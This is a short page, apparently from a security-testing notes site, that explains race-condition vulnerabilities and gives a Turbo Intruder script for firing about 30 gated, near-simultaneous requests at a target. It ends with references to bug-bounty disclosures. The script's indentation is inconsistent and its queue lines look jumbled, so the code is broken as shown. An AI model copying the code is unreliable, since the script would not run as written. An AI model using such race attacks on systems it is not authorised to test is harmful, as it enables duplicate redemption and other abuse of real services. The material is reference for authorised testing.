Race Condition

A race condition vulnerability occurs when the behavior or outcome of a system or program depends on the timing or sequence of events, and multiple processes or threads compete for shared resources or data. This can result in unexpected or erroneous behavior, including security vulnerabilities, if the processes or threads don't coordinate properly. For example, if two processes try to write to the same file at the same time, the file may end up with unexpected or corrupted data.

Turbo Intruder

Utilizing Turbo Intruder, we can leverage the race.py script to send a request several times in an extremely short period of time:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=30,
                           pipeline=False
                           )

   for i in range(30):
    engine.queue(target.req, i)
        engine.queue(target.req, target.baseInput, gate='race1')


    engine.start(timeout=5)
   engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

References

Reverb.com disclosed on HackerOne: Race Condition allows to redeem...HackerOne

RACE Condition vulnerability found in bug-bounty programMedium

PreviousPrototype Pollution NextRate Limit Bypass

Last updated 7 months ago